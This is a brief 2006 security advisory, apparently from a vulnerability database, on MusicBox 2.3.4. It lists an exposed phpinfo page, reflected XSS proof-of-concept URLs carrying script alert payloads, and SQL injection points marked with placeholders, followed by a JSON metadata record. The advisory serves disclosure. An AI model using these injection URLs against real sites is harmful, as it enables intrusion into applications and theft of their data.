Description
MusicBox 2.3.4
http://www.musicboxv2.com
------------
PHPinfo page
------------
/phpinfo.php
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists
-------------
SQL injection
-------------
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
{"id": "SECURITYVULNS:DOC:13612", "bulletinFamily": "software", "title": "MusicBox <= 2.3.4 XSS SQL injection Vulnerability", "description": "MusicBox 2.3.4\r\nhttp://www.musicboxv2.com\r\n------------\r\nPHPinfo page\r\n------------\r\n/phpinfo.php\r\n--------------------------\r\nCross Site Scripting (XSS)\r\n--------------------------\r\nhttp://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0\r\nhttp://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0\r\nhttp://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0\r\nhttp://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>\r\nhttp://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists\r\n-------------\r\nSQL injection\r\n-------------\r\nhttp://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]\r\nhttp://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists\r\nhttp://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]\r\n-----------------\r\nEllipsis Security\r\nhttp://www.ellsec.org", "published": "2006-07-25T00:00:00", "modified": "2006-07-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13612", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 35, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6399"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6399"]}]}, "exploitation": null, "vulnersScore": -0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645619300, "score": 1659803227}, "_internal": {"score_hash": "41702701f4b19384011a52aac980cb6c"}}
{}